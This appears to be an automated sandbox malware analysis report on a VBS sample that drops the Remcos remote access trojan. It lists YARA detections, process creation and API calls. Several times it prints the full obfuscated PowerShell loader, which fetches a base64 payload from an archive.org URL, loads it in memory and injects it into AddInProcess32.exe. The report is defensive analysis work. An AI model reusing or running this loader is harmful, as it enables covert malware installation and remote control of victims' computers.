            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004167B4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347625FA2_2_00007FFD347625FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347629FA2_2_00007FFD347629FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347616C92_2_00007FFD347616C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347725FA4_2_00007FFD347725FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347718FD4_2_00007FFD347718FD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3477509B4_2_00007FFD3477509B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347728D34_2_00007FFD347728D3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3478140D4_2_00007FFD3478140D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34781F314_2_00007FFD34781F31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E0CC7_2_0043E0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041F0FA7_2_0041F0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004541597_2_00454159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004381687_2_00438168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004461F07_2_004461F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E2FB7_2_0043E2FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0045332B7_2_0045332B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0042739D7_2_0042739D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004374E67_2_004374E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E5587_2_0043E558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004387707_2_00438770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004378FE7_2_004378FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004339467_2_00433946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044D9C97_2_0044D9C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00427A467_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041DB627_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00427BAF7_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00437D337_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00435E5E7_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00426E0E7_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043DE9D7_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00413FCA7_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00436FEA7_2_00436FEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
            Source: sostener.vbsInitial sample: Strings found which are bigger than 50
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@12/6@11/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-XDNGQ0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0sszj1e.el2.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
